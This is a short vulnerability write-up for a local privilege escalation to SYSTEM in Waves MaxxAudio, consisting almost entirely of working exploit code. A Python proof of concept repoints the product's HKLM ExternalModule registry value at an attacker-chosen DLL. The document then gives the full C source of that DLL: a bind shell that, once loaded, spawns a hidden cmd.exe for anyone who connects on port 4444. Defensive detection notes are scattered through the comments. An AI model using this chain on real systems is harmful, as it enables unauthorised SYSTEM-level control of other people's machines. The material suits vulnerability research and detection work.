Write Up: VerSprite | Waves Maxx Audio
Advisories: VerSprite – CVEDETAILS
Comments: This vulnerability, when exploited, can lead to SYSTEM-privileged access on the compromised device. I am not sure why “CVEDETAILS” rates this with a CVSS of only 4.4 when the other LPE to SYSTEM is rated 7.7….
python WavesMaxxAudio-PoC.py
import sys
import winreg
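def set_registry(src,value_name,value_data):
    """Write a REG_SZ value under ``HKEY_LOCAL_MACHINE\\<src>`` (64-bit view).

    Args:
        src: Sub-key path below HKLM.
        value_name: Name of the value to set.
        value_data: String stored as REG_SZ.

    Returns:
        True once the value has been written.

    Raises:
        OSError: if the key cannot be opened for writing (a PermissionError
            when the key's ACL denies the caller) or the write fails.

    The key handle is held in a ``with`` block so it is released even when
    ``SetValueEx`` raises.  This is ordinary ``winreg`` usage; the write-up's
    point is that the product's key is writable from a low-privilege context,
    which is not something this helper can verify.
    """
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, src, 0,
                        winreg.KEY_WRITE | winreg.KEY_WOW64_64KEY) as registry_key:
        winreg.SetValueEx(registry_key, value_name, 0, winreg.REG_SZ, value_data)
    return True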
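def read_registry(src,value_name):
    """Read a value under ``HKEY_LOCAL_MACHINE\\<src>`` (64-bit view).

    Args:
        src: Sub-key path below HKLM.
        value_name: Name of the value to query.

    Returns:
        The value's data as returned by ``QueryValueEx``; the registry type
        is discarded.

    Raises:
        OSError: if the key or value does not exist (FileNotFoundError) or
            the key cannot be opened for reading.

    Uses a ``with`` block so the handle is closed even if the query raises.
    """
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, src, 0,
                        winreg.KEY_READ | winreg.KEY_WOW64_64KEY) as registry_key:
        value_data, _value_type = winreg.QueryValueEx(registry_key, value_name)
    return value_data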
def main():
    """Entry point of the PoC: repoint MaxxAudio's ``ExternalModule`` value at a caller-supplied DLL.

    Reads the DLL path from ``sys.argv[1]``, prints the current data of
    ``HKLM\\SOFTWARE\\Waves Audio\\MaxxAudio\\General\\ExternalModule``,
    overwrites it, and prints the new data.  The value write is the only
    state change this script makes, which makes that exact path the thing
    to watch for in registry value-set telemetry (e.g. Sysmon Event ID 13).
    """
    if(len(sys.argv) < 2):
        # Usage error still exits with status 0.
        print("Incorrect usage.\nUsage: WavesMaxxAudio-PoC.py <path_to_malicious_dll>")
        sys.exit(0)
    user_malicious_dll_path = sys.argv[1]
    # The supplied path is prepended to a ';'-separated list.  Presumably the
    # product's loader walks every entry — that behaviour is not visible here.
    reg_value_data = user_malicious_dll_path + ";KblCoefsRender51164.dll;MaxxAudio5"
    reg_src = r"SOFTWARE\Waves Audio\MaxxAudio\General"
    reg_value_name = "ExternalModule"
    print("[!] PoC for Waves MaxxAudio LPE")
    # Snapshot the original data first so the change is visible in the output.
    print("[*] Reading Current registry key value:")
    print(read_registry(reg_src,reg_value_name))
    print("[*] Writing malicious key value now")
    set_registry(reg_src,reg_value_name,reg_value_data)
    print("[*] Overwrite Finished:\n[*] Reading new key value data now")
    print(read_registry(reg_src,reg_value_name))
if __name__ == '__main__':
    # Ctrl-C during the registry round-trip is reported rather than traced.
    try:
        main()
    except KeyboardInterrupt:
        print('Interrupted')
        sys.exit(0)
Malicious DLL
#include "stdafx.h"
#include <thread>
#include <shellapi.h>
#include <winsock2.h>
#pragma comment(lib,"ws2_32")
// Opens an unauthenticated TCP listener on every interface, port 4444, and
// attaches a hidden cmd.exe to the first connection that arrives.  The shell
// runs in the security context of whichever process loaded this DLL (the
// write-up says that is SYSTEM; the code itself cannot confirm that).
// Detection-relevant facts, all visible below: a LISTEN socket on 4444 owned
// by the host process, a cmd.exe child whose std handles are a socket, and
// all of it happening from DllMain.
void bind_shell() {
    WSADATA wsaData;
    SOCKET sock;
    struct sockaddr_in sin;
    WSAStartup(MAKEWORD(2, 2), &wsaData);
    sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
    // INADDR_ANY: reachable from any interface, not just loopback, and nothing
    // authenticates the peer — whoever connects first gets the shell.
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = htonl(INADDR_ANY);
    sin.sin_port = htons((u_short)4444);
    bind(sock, (SOCKADDR*)& sin, sizeof(sin));
    listen(sock, SOMAXCONN);
    // Blocks the calling thread (DllMain's, see below) until a client connects.
    SOCKET tmp = accept(sock, 0, 0);
    STARTUPINFO si = { 0 };
    PROCESS_INFORMATION pi = { 0 };
    si.cb = sizeof(si);
    // The child's stdin/stdout/stderr are the accepted socket; window hidden.
    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;
    si.hStdOutput = (HANDLE)tmp;
    si.hStdError = (HANDLE)tmp;
    si.hStdInput = (HANDLE)tmp;
    // L"..." assigned to TCHAR implies a UNICODE build (presumably via stdafx.h).
    TCHAR commandLine[256] = L"cmd.exe";
    // bInheritHandles = true is what hands the socket to cmd.exe.  The parent
    // does not wait on the child, so process-creation telemetry sees a cmd.exe
    // whose parent is the DLL's host process.
    CreateProcess(NULL, commandLine, 0, 0, true, CREATE_NEW_CONSOLE, 0, 0, &si, &pi);
    // Releases the parent's handles only; cmd.exe keeps running.
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    // Closes the parent's copy of the connection; the child's inherited
    // handle stays open.
    closesocket(tmp);
    // `sock` is never closed, so the host process keeps port 4444 in LISTEN
    // for its lifetime — a durable artifact for netstat / endpoint telemetry.
    return;
}
// DLL entry point.  bind_shell() is called unconditionally — ul_reason_for_call
// is not inspected — so the listener is set up the moment the host process
// loads the DLL, and the call blocks inside DllMain until a client connects
// and cmd.exe has been spawned.  Network I/O and process creation from
// DllMain are themselves strong anomaly signals for loader-side detection.
BOOL APIENTRY DllMain(HMODULE hModule,
                      DWORD ul_reason_for_call,
                      LPVOID lpReserved
                     )
{
    bind_shell();
    return TRUE;
}